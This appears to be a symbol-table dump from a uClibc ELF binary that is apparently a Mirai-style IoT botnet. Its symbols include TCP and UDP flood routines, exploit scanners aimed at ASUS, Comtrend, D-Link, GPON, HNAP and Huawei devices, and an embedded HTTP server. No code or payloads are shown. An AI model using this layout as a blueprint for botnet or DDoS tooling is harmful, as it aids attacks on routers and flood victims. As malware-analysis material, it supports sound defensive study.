                              __GI_strdup.symtab0x2796456FUNC<unknown>HIDDEN2
                              __GI_strlen.symtab0x27584120FUNC<unknown>HIDDEN2
                              __GI_strncmp.symtab0x2ead0244FUNC<unknown>HIDDEN2
                              __GI_strnlen.symtab0x275fc244FUNC<unknown>HIDDEN2
                              __GI_strpbrk.symtab0x2ec9072FUNC<unknown>HIDDEN2
                              __GI_strrchr.symtab0x2e7d0192FUNC<unknown>HIDDEN2
                              __GI_strspn.symtab0x2ebc484FUNC<unknown>HIDDEN2
                              __GI_strstr.symtab0x276f0288FUNC<unknown>HIDDEN2
                              __GI_strtok.symtab0x279a440FUNC<unknown>HIDDEN2
                              __GI_strtok_r.symtab0x2ec18120FUNC<unknown>HIDDEN2
                              __GI_strtol.symtab0x2eeb420FUNC<unknown>HIDDEN2
                              __GI_sysconf.symtab0x29bc81140FUNC<unknown>HIDDEN2
                              __GI_tcgetattr.symtab0x2ecf8108FUNC<unknown>HIDDEN2
                              __GI_time.symtab0x2434040FUNC<unknown>HIDDEN2
                              __GI_times.symtab0x2bb5c40FUNC<unknown>HIDDEN2
                              __GI_unlink.symtab0x2bb8c88FUNC<unknown>HIDDEN2
                              __GI_vfork.symtab0x2f15c76FUNC<unknown>HIDDEN2
                              __GI_vsnprintf.symtab0x24954164FUNC<unknown>HIDDEN2
                              __GI_wait4.symtab0x2bbec100FUNC<unknown>HIDDEN2
                              __GI_wcrtomb.symtab0x2c10876FUNC<unknown>HIDDEN2
                              __GI_wcsnrtombs.symtab0x2c178192FUNC<unknown>HIDDEN2
                              __GI_wcsrtombs.symtab0x2c15428FUNC<unknown>HIDDEN2
                              __GI_write.symtab0x2a908132FUNC<unknown>HIDDEN2
                              __JCR_END__.symtab0x442f00OBJECT<unknown>DEFAULT9
                              __JCR_LIST__.symtab0x442f00OBJECT<unknown>DEFAULT9
                              __app_fini.symtab0x451184OBJECT<unknown>HIDDEN12
                              __atexit_lock.symtab0x445f424OBJECT<unknown>DEFAULT11
                              __bss_start.symtab0x447080NOTYPE<unknown>DEFAULTSHN_ABS
                              __check_one_fd.symtab0x2acd884FUNC<unknown>DEFAULT2
                              __close.symtab0x2a808124FUNC<unknown>DEFAULT2
                              __close_nocancel.symtab0x2a81432FUNC<unknown>DEFAULT2
                              __ctype_b.symtab0x4461c4OBJECT<unknown>DEFAULT11
                              __curbrk.symtab0x4767c4OBJECT<unknown>HIDDEN12
                              __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __do_global_ctors_aux.symtab0x2ff740FUNC<unknown>DEFAULT2
                              __do_global_dtors_aux.symtab0x100d00FUNC<unknown>DEFAULT2
                              __dso_handle.symtab0x444800OBJECT<unknown>HIDDEN11
                              __environ.symtab0x451104OBJECT<unknown>DEFAULT12
                              __errno_location.symtab0x2486436FUNC<unknown>DEFAULT2
                              __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __exit_cleanup.symtab0x44bc04OBJECT<unknown>HIDDEN12
                              __fcntl_nocancel.symtab0x23e70196FUNC<unknown>DEFAULT2
                              __fgetc_unlocked.symtab0x2e1c0344FUNC<unknown>DEFAULT2
                              __fini_array_end.symtab0x442e00NOTYPE<unknown>HIDDEN6
                              __fini_array_start.symtab0x442e00NOTYPE<unknown>HIDDEN6
                              __fork.symtab0x2a0441088FUNC<unknown>DEFAULT2
                              __fork_generation_pointer.symtab0x47ac84OBJECT<unknown>HIDDEN12
                              __fork_handlers.symtab0x47acc4OBJECT<unknown>HIDDEN12
                              __fork_lock.symtab0x44bc44OBJECT<unknown>HIDDEN12
                              __getdents.symtab0x2b5e4176FUNC<unknown>HIDDEN2
                              __getdents64.symtab0x2f770304FUNC<unknown>HIDDEN2
                              __getpagesize.symtab0x2b72456FUNC<unknown>DEFAULT2
                              __getpid.symtab0x2a54888FUNC<unknown>DEFAULT2
                              __glibc_strerror_r.symtab0x2781032FUNC<unknown>DEFAULT2
                              __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __init_array_end.symtab0x442e00NOTYPE<unknown>HIDDEN6
                              __init_array_start.symtab0x442e00NOTYPE<unknown>HIDDEN6
                              __libc_accept.symtab0x279f496FUNC<unknown>DEFAULT2
                              __libc_close.symtab0x2a808124FUNC<unknown>DEFAULT2
                              __libc_connect.symtab0x27a7896FUNC<unknown>DEFAULT2
                              __libc_disable_asynccancel.symtab0x2aa18196FUNC<unknown>HIDDEN2
                              __libc_enable_asynccancel.symtab0x2aadc268FUNC<unknown>HIDDEN2
                              __libc_errno.symtab0x04TLS<unknown>HIDDEN6
                              __libc_fcntl.symtab0x23f34248FUNC<unknown>DEFAULT2
                              __libc_fork.symtab0x2a0441088FUNC<unknown>DEFAULT2
                              __libc_h_errno.symtab0x44TLS<unknown>HIDDEN6
                              __libc_nanosleep.symtab0x2b98c72FUNC<unknown>DEFAULT2
                              __libc_open.symtab0x2a884132FUNC<unknown>DEFAULT2
                              __libc_read.symtab0x2a98c132FUNC<unknown>DEFAULT2
                              __libc_recv.symtab0x27b4492FUNC<unknown>DEFAULT2
                              __libc_recvfrom.symtab0x27ba096FUNC<unknown>DEFAULT2
                              __libc_select.symtab0x2421884FUNC<unknown>DEFAULT2
                              __libc_send.symtab0x27c0092FUNC<unknown>DEFAULT2
                              __libc_sendto.symtab0x27c5c96FUNC<unknown>DEFAULT2
                              __libc_setup_tls.symtab0x2f284636FUNC<unknown>DEFAULT2
                              __libc_sigaction.symtab0x2b364264FUNC<unknown>DEFAULT2
                              __libc_stack_end.symtab0x4510c4OBJECT<unknown>DEFAULT12
                              __libc_system.symtab0x2b1b0348FUNC<unknown>DEFAULT2
                              __libc_write.symtab0x2a908132FUNC<unknown>DEFAULT2
                              __lll_lock_wait_private.symtab0x2a49c172FUNC<unknown>HIDDEN2
                              __malloc_consolidate.symtab0x28c98436FUNC<unknown>HIDDEN2
                              __malloc_largebin_index.symtab0x27d0c144FUNC<unknown>DEFAULT2
                              __malloc_lock.symtab0x4451824OBJECT<unknown>DEFAULT11
                              __malloc_state.symtab0x47750888OBJECT<unknown>DEFAULT12
                              __malloc_trim.symtab0x28be8176FUNC<unknown>DEFAULT2
                              __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __open.symtab0x2a884132FUNC<unknown>DEFAULT2
                              __open_nocancel.symtab0x2a89032FUNC<unknown>DEFAULT2
                              __pagesize.symtab0x451144OBJECT<unknown>DEFAULT12
                              __preinit_array_end.symtab0x442e00NOTYPE<unknown>HIDDEN6
                              __preinit_array_start.symtab0x442e00NOTYPE<unknown>HIDDEN6
                              __progname.symtab0x446104OBJECT<unknown>DEFAULT11
                              __progname_full.symtab0x446144OBJECT<unknown>DEFAULT11
                              __pthread_initialize_minimal.symtab0x2f50024FUNC<unknown>DEFAULT2
                              __pthread_mutex_init.symtab0x2abf08FUNC<unknown>DEFAULT2
                              __pthread_mutex_lock.symtab0x2abe88FUNC<unknown>DEFAULT2
                              __pthread_mutex_trylock.symtab0x2abe88FUNC<unknown>DEFAULT2
                              __pthread_mutex_unlock.symtab0x2abe88FUNC<unknown>DEFAULT2
                              __pthread_return_0.symtab0x2abe88FUNC<unknown>DEFAULT2
                              __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __read.symtab0x2a98c132FUNC<unknown>DEFAULT2
                              __read_nocancel.symtab0x2a99832FUNC<unknown>DEFAULT2
                              __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              __rt_sigreturn_stub.symtab0x2b33c16FUNC<unknown>DEFAULT2
                              __rtld_fini.symtab0x4511c4OBJECT<unknown>HIDDEN12
                              __sigjmp_save.symtab0x2ee6060FUNC<unknown>HIDDEN2
                              __sigreturn_stub.symtab0x2b34c16FUNC<unknown>DEFAULT2
                              __sigsetjmp.symtab0x2b4e028FUNC<unknown>DEFAULT2
                              __socketcall.symtab0x2b50492FUNC<unknown>HIDDEN2
                              __socketcall.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __sparc32_atomic_locks.symtab0x44b6864OBJECT<unknown>HIDDEN12
                              __stdin.symtab0x446304OBJECT<unknown>DEFAULT11
                              __stdio_READ.symtab0x2fa8c104FUNC<unknown>HIDDEN2
                              __stdio_WRITE.symtab0x2fafc248FUNC<unknown>HIDDEN2
                              __stdio_adjust_position.symtab0x2fbfc248FUNC<unknown>HIDDEN2
                              __stdio_fwrite.symtab0x2ca60320FUNC<unknown>HIDDEN2
                              __stdio_rfill.symtab0x2fcf456FUNC<unknown>HIDDEN2
                              __stdio_seek.symtab0x2fde052FUNC<unknown>HIDDEN2
                              __stdio_trans2r_o.symtab0x2fd34172FUNC<unknown>HIDDEN2
                              __stdio_trans2w_o.symtab0x2cd68272FUNC<unknown>HIDDEN2
                              __stdio_wcommit.symtab0x2ce7856FUNC<unknown>HIDDEN2
                              __stdout.symtab0x446344OBJECT<unknown>DEFAULT11
                              __syscall_error.symtab0x2b31440FUNC<unknown>HIDDEN2
                              __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __syscall_nanosleep.symtab0x2b93092FUNC<unknown>DEFAULT2
                              __syscall_select.symtab0x241b0104FUNC<unknown>DEFAULT2
                              __uClibc_fini.symtab0x2ac30168FUNC<unknown>DEFAULT2
                              __uClibc_init.symtab0x2ad2c92FUNC<unknown>DEFAULT2
                              __uClibc_main.symtab0x2ad881056FUNC<unknown>DEFAULT2
                              __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __ubp_memchr.symtab0x2e438280FUNC<unknown>DEFAULT2
                              __uclibc_progname.symtab0x4460c4OBJECT<unknown>HIDDEN11
                              __vfork.symtab0x2f15c76FUNC<unknown>DEFAULT2
                              __write.symtab0x2a908132FUNC<unknown>DEFAULT2
                              __write_nocancel.symtab0x2a91432FUNC<unknown>DEFAULT2
                              __xpg_strerror_r.symtab0x27838300FUNC<unknown>DEFAULT2
                              __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __xstat32_conv.symtab0x243f4132FUNC<unknown>HIDDEN2
                              __xstat64_conv.symtab0x24368140FUNC<unknown>HIDDEN2
                              _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _bss_custom_printf_spec.symtab0x44ba810OBJECT<unknown>DEFAULT12
                              _charpad.symtab0x249f864FUNC<unknown>DEFAULT2
                              _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _custom_printf_arginfo.symtab0x4770040OBJECT<unknown>HIDDEN12
                              _custom_printf_handler.symtab0x4772840OBJECT<unknown>HIDDEN12
                              _custom_printf_spec.symtab0x445144OBJECT<unknown>HIDDEN11
                              _dl_aux_init.symtab0x2f52064FUNC<unknown>DEFAULT2
                              _dl_nothread_init_static_tls.symtab0x2f56084FUNC<unknown>HIDDEN2
                              _dl_phdr.symtab0x47af04OBJECT<unknown>DEFAULT12
                              _dl_phnum.symtab0x47af44OBJECT<unknown>DEFAULT12
                              _dl_tls_dtv_gaps.symtab0x47ae41OBJECT<unknown>DEFAULT12
                              _dl_tls_dtv_slotinfo_list.symtab0x47ae04OBJECT<unknown>DEFAULT12
                              _dl_tls_generation.symtab0x47ae84OBJECT<unknown>DEFAULT12
                              _dl_tls_max_dtv_idx.symtab0x47ad84OBJECT<unknown>DEFAULT12
                              _dl_tls_setup.symtab0x2f22892FUNC<unknown>DEFAULT2
                              _dl_tls_static_align.symtab0x47ad44OBJECT<unknown>DEFAULT12
                              _dl_tls_static_nelem.symtab0x47aec4OBJECT<unknown>DEFAULT12
                              _dl_tls_static_size.symtab0x47adc4OBJECT<unknown>DEFAULT12
                              _dl_tls_static_used.symtab0x47ad04OBJECT<unknown>DEFAULT12
                              _edata.symtab0x447080NOTYPE<unknown>DEFAULTSHN_ABS
                              _end.symtab0x47af80NOTYPE<unknown>DEFAULTSHN_ABS
                              _exit.symtab0x24034128FUNC<unknown>DEFAULT2
                              _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _fini.symtab0x2ffbc0FUNC<unknown>DEFAULT3
                              _fixed_buffers.symtab0x451408192OBJECT<unknown>DEFAULT12
                              _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _fp_out_narrow.symtab0x24a38116FUNC<unknown>DEFAULT2
                              _fpmaxtostr.symtab0x2d0bc2032FUNC<unknown>HIDDEN2
                              _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _init.symtab0x100b40FUNC<unknown>DEFAULT1
                              _load_inttype.symtab0x2ceb0144FUNC<unknown>HIDDEN2
                              _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_init.symtab0x2521c156FUNC<unknown>HIDDEN2
                              _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_parsespec.symtab0x2555c1604FUNC<unknown>HIDDEN2
                              _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_prepargs.symtab0x252b860FUNC<unknown>HIDDEN2
                              _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_setargs.symtab0x252f4492FUNC<unknown>HIDDEN2
                              _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _promoted_size.symtab0x254e8116FUNC<unknown>DEFAULT2
                              _pthread_cleanup_pop_restore.symtab0x2ac0436FUNC<unknown>DEFAULT2
                              _pthread_cleanup_push_defer.symtab0x2abf812FUNC<unknown>DEFAULT2
                              _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _setjmp.symtab0x2b4d48FUNC<unknown>DEFAULT2
                              _start.symtab0x101c456FUNC<unknown>DEFAULT2
                              _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _stdio_fopen.symtab0x2c5bc1188FUNC<unknown>HIDDEN2
                              _stdio_init.symtab0x2cba8124FUNC<unknown>HIDDEN2
                              _stdio_openlist.symtab0x446384OBJECT<unknown>DEFAULT11
                              _stdio_openlist_add_lock.symtab0x4512012OBJECT<unknown>DEFAULT12
                              _stdio_openlist_dec_use.symtab0x2daf8736FUNC<unknown>HIDDEN2
                              _stdio_openlist_del_count.symtab0x4513c4OBJECT<unknown>DEFAULT12
                              _stdio_openlist_del_lock.symtab0x4512c12OBJECT<unknown>DEFAULT12
                              _stdio_openlist_use_count.symtab0x451384OBJECT<unknown>DEFAULT12
                              _stdio_streams.symtab0x4463c204OBJECT<unknown>DEFAULT11
                              _stdio_term.symtab0x2cc24316FUNC<unknown>HIDDEN2
                              _stdio_user_locking.symtab0x446204OBJECT<unknown>DEFAULT11
                              _stdlib_strto_l.symtab0x2eed0472FUNC<unknown>HIDDEN2
                              _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _store_inttype.symtab0x2cf4060FUNC<unknown>HIDDEN2
                              _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _string_syserrmsgs.symtab0x332c82934OBJECT<unknown>HIDDEN4
                              _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _uintmaxtostr.symtab0x2cf7c312FUNC<unknown>HIDDEN2
                              _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _vfprintf_internal.symtab0x24ab41896FUNC<unknown>HIDDEN2
                              _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              abort.symtab0x290c0280FUNC<unknown>DEFAULT2
                              abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              accept.symtab0x279f496FUNC<unknown>DEFAULT2
                              accept.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              arch_names.symtab0x3196032OBJECT<unknown>DEFAULT4
                              asus.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              asus_fake_time.symtab0x447584OBJECT<unknown>DEFAULT12
                              asus_init.symtab0x102d02756FUNC<unknown>DEFAULT2
                              asus_rsck.symtab0x447284OBJECT<unknown>DEFAULT12
                              asus_scanner_pid.symtab0x447244OBJECT<unknown>DEFAULT12
                              asus_scanner_rawpkt.symtab0x4473040OBJECT<unknown>DEFAULT12
                              asus_setup_connection.symtab0x101fc212FUNC<unknown>DEFAULT2
                              atoi.symtab0x2ee9c24FUNC<unknown>DEFAULT2
                              atol.symtab0x2ee9c24FUNC<unknown>DEFAULT2
                              atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              attack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              attack_get_opt_int.symtab0x11274112FUNC<unknown>DEFAULT2
                              attack_get_opt_ip.symtab0x11204112FUNC<unknown>DEFAULT2
                              attack_init.symtab0x112e4940FUNC<unknown>DEFAULT2
                              attack_kill_all.symtab0x10e6c392FUNC<unknown>DEFAULT2
                              attack_method_nudp.symtab0x14b2c1408FUNC<unknown>DEFAULT2
                              attack_method_stdhex.symtab0x14864712FUNC<unknown>DEFAULT2
                              attack_method_tcp.symtab0x11d101620FUNC<unknown>DEFAULT2
                              attack_ongoing.symtab0x4476432OBJECT<unknown>DEFAULT12
                              attack_parse.symtab0x10ff4528FUNC<unknown>DEFAULT2
                              attack_start.symtab0x10d94216FUNC<unknown>DEFAULT2
                              attack_tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              attack_tcp_ack.symtab0x130f01744FUNC<unknown>DEFAULT2
                              attack_tcp_null.symtab0x13e5c1904FUNC<unknown>DEFAULT2
                              attack_tcp_sack2.symtab0x123641640FUNC<unknown>DEFAULT2
                              attack_tcp_stomp.symtab0x129cc1828FUNC<unknown>DEFAULT2
                              attack_tcp_syn.symtab0x116901664FUNC<unknown>DEFAULT2
                              attack_tcp_syndata.symtab0x137c01692FUNC<unknown>DEFAULT2
                              attack_udp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              attack_udp_plain.symtab0x145d4656FUNC<unknown>DEFAULT2
                              bcopy.symtab0x25ce412FUNC<unknown>DEFAULT2
                              been_there_done_that.symtab0x44bbc4OBJECT<unknown>DEFAULT12
                              bind.symtab0x27a5436FUNC<unknown>DEFAULT2
                              bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              blink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              brk.symtab0x2f5bc88FUNC<unknown>DEFAULT2
                              brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              bzero.symtab0x2734852FUNC<unknown>DEFAULT2
                              call___do_global_ctors_aux.symtab0x2ffb00FUNC<unknown>DEFAULT2
                              call___do_global_dtors_aux.symtab0x1014c0FUNC<unknown>DEFAULT2
                              call_frame_dummy.symtab0x101b80FUNC<unknown>DEFAULT2
                              calloc.symtab0x28730284FUNC<unknown>DEFAULT2
                              calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              checksum_generic.symtab0x15ca8100FUNC<unknown>DEFAULT2
                              checksum_tcpudp.symtab0x15d0c200FUNC<unknown>DEFAULT2
                              clock.symtab0x2488856FUNC<unknown>DEFAULT2
                              clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              close.symtab0x2a808124FUNC<unknown>DEFAULT2
                              closedir.symtab0x24480208FUNC<unknown>DEFAULT2
                              closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              completed.4753.symtab0x447081OBJECT<unknown>DEFAULT12
                              comtrend.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              comtrend_fake_time.symtab0x447f04OBJECT<unknown>DEFAULT12
                              comtrend_init.symtab0x15ea83140FUNC<unknown>DEFAULT2
                              comtrend_init_pid.symtab0x447c04OBJECT<unknown>DEFAULT12
                              comtrend_init_rawpkt.symtab0x447c840OBJECT<unknown>DEFAULT12
                              comtrend_range.symtab0x4448c36OBJECT<unknown>DEFAULT11
                              comtrend_rsck.symtab0x447c44OBJECT<unknown>DEFAULT12
                              comtrend_setup_connection.symtab0x15dd4212FUNC<unknown>DEFAULT2
                              conn_table.symtab0x447bc4OBJECT<unknown>DEFAULT12
                              conn_table.symtab0x44a044OBJECT<unknown>DEFAULT12
                              conn_table.symtab0x44abc4OBJECT<unknown>DEFAULT12
                              conn_table.symtab0x44af44OBJECT<unknown>DEFAULT12
                              conn_table.symtab0x44b644OBJECT<unknown>DEFAULT12
                              conn_table.symtab0x476804OBJECT<unknown>DEFAULT12
                              connect.symtab0x27a7896FUNC<unknown>DEFAULT2
                              connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              dlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              dlink_init.symtab0x16bc02840FUNC<unknown>DEFAULT2
                              dlinkscanner_fake_time.symtab0x448284OBJECT<unknown>DEFAULT12
                              dlinkscanner_rsck.symtab0x447f84OBJECT<unknown>DEFAULT12
                              dlinkscanner_scanner_pid.symtab0x447f44OBJECT<unknown>DEFAULT12
                              dlinkscanner_scanner_rawpkt.symtab0x4480040OBJECT<unknown>DEFAULT12
                              dlinkscanner_setup_connection.symtab0x16aec212FUNC<unknown>DEFAULT2
                              entries.symtab0x476b04OBJECT<unknown>DEFAULT12
                              environ.symtab0x451104OBJECT<unknown>DEFAULT12
                              errno.symtab0x04TLS<unknown>DEFAULT6
                              errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              estridx.symtab0x33238126OBJECT<unknown>DEFAULT4
                              execl.symtab0x2f0b0172FUNC<unknown>DEFAULT2
                              execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              execve.symtab0x2f61c96FUNC<unknown>DEFAULT2
                              execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              exit.symtab0x29754168FUNC<unknown>DEFAULT2
                              exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              exp10_table.symtab0x3425072OBJECT<unknown>DEFAULT4
                              fclose.symtab0x2c240860FUNC<unknown>DEFAULT2
                              fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fcntl.symtab0x23f34248FUNC<unknown>DEFAULT2
                              fd_ctrl.symtab0x444e04OBJECT<unknown>DEFAULT11
                              fd_serv.symtab0x444e44OBJECT<unknown>DEFAULT11
                              fd_to_DIR.symtab0x24558176FUNC<unknown>DEFAULT2
                              fdopendir.symtab0x246ec176FUNC<unknown>DEFAULT2
                              fflush_unlocked.symtab0x2ddd8992FUNC<unknown>DEFAULT2
                              fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fgetc.symtab0x2d8ac320FUNC<unknown>DEFAULT2
                              fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fgetc_unlocked.symtab0x2e1c0344FUNC<unknown>DEFAULT2
                              fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fgets.symtab0x2d9ec260FUNC<unknown>DEFAULT2
                              fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fgets_unlocked.symtab0x2e318160FUNC<unknown>DEFAULT2
                              fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              first_connect.symtab0x4497c4OBJECT<unknown>DEFAULT12
                              fmt.symtab0x3423820OBJECT<unknown>DEFAULT4
                              fopen.symtab0x2c59c24FUNC<unknown>DEFAULT2
                              fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fork.symtab0x2a0441088FUNC<unknown>DEFAULT2
                              fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fork_handler_pool.symtab0x44bc81348OBJECT<unknown>DEFAULT12
                              fputs_unlocked.symtab0x25ba060FUNC<unknown>DEFAULT2
                              fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              frame_dummy.symtab0x101580FUNC<unknown>DEFAULT2
                              free.symtab0x28e54564FUNC<unknown>DEFAULT2
                              free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fseek.symtab0x2f8a036FUNC<unknown>DEFAULT2
                              fseeko.symtab0x2f8a036FUNC<unknown>DEFAULT2
                              fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fseeko64.symtab0x2f8cc448FUNC<unknown>DEFAULT2
                              fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fstat.symtab0x2b568116FUNC<unknown>DEFAULT2
                              fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              fwrite_unlocked.symtab0x25be4196FUNC<unknown>DEFAULT2
                              fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getc.symtab0x2d8ac320FUNC<unknown>DEFAULT2
                              getc_unlocked.symtab0x2e1c0344FUNC<unknown>DEFAULT2
                              getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getdtablesize.symtab0x2b69440FUNC<unknown>DEFAULT2
                              getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getegid.symtab0x2b6bc32FUNC<unknown>DEFAULT2
                              getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              geteuid.symtab0x2b6dc32FUNC<unknown>DEFAULT2
                              geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getgid.symtab0x2b6fc32FUNC<unknown>DEFAULT2
                              getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getpagesize.symtab0x2b72456FUNC<unknown>DEFAULT2
                              getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getpid.symtab0x2a54888FUNC<unknown>DEFAULT2
                              getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getppid.symtab0x240b432FUNC<unknown>DEFAULT2
                              getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getrlimit.symtab0x2b76492FUNC<unknown>DEFAULT2
                              getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getsockname.symtab0x27ad836FUNC<unknown>DEFAULT2
                              getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getsockopt.symtab0x27afc44FUNC<unknown>DEFAULT2
                              getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              getuid.symtab0x2b7c032FUNC<unknown>DEFAULT2
                              getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              gpon443.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              gpon443_fake_time.symtab0x448604OBJECT<unknown>DEFAULT12
                              gpon443_init.symtab0x177ac2888FUNC<unknown>DEFAULT2
                              gpon443_init_pid.symtab0x4482c4OBJECT<unknown>DEFAULT12
                              gpon443_init_rawpkt.symtab0x4483840OBJECT<unknown>DEFAULT12
                              gpon443_ranges.symtab0x444b044OBJECT<unknown>DEFAULT11
                              gpon443_rsck.symtab0x448304OBJECT<unknown>DEFAULT12
                              gpon443_setup_connection.symtab0x176d8212FUNC<unknown>DEFAULT2
                              gpon80.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              gpon80_fake_time.symtab0x448984OBJECT<unknown>DEFAULT12
                              gpon80_init.symtab0x183c82752FUNC<unknown>DEFAULT2
                              gpon80_init_pid.symtab0x448644OBJECT<unknown>DEFAULT12
                              gpon80_init_rawpkt.symtab0x4487040OBJECT<unknown>DEFAULT12
                              gpon80_rsck.symtab0x448684OBJECT<unknown>DEFAULT12
                              gpon80_setup_connection.symtab0x182f4212FUNC<unknown>DEFAULT2
                              h_errno.symtab0x44TLS<unknown>DEFAULT6
                              hexPayload.symtab0x444884OBJECT<unknown>DEFAULT11
                              hnap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              hnap_init.symtab0x18f5c2688FUNC<unknown>DEFAULT2
                              hnapscanner_fake_time.symtab0x448d04OBJECT<unknown>DEFAULT12
                              hnapscanner_rsck.symtab0x448a04OBJECT<unknown>DEFAULT12
                              hnapscanner_scanner_pid.symtab0x4489c4OBJECT<unknown>DEFAULT12
                              hnapscanner_scanner_rawpkt.symtab0x448a840OBJECT<unknown>DEFAULT12
                              hnapscanner_setup_connection.symtab0x18e88212FUNC<unknown>DEFAULT2
                              httpd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              httpd_pid.symtab0x444dc4OBJECT<unknown>DEFAULT11
                              httpd_port.symtab0x449844OBJECT<unknown>DEFAULT12
                              httpd_serve.symtab0x19a48568FUNC<unknown>DEFAULT2
                              httpd_start.symtab0x19c80452FUNC<unknown>DEFAULT2
                              httpd_started.symtab0x449884OBJECT<unknown>DEFAULT12
                              huawei.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              huawei_fake_time.symtab0x449084OBJECT<unknown>DEFAULT12
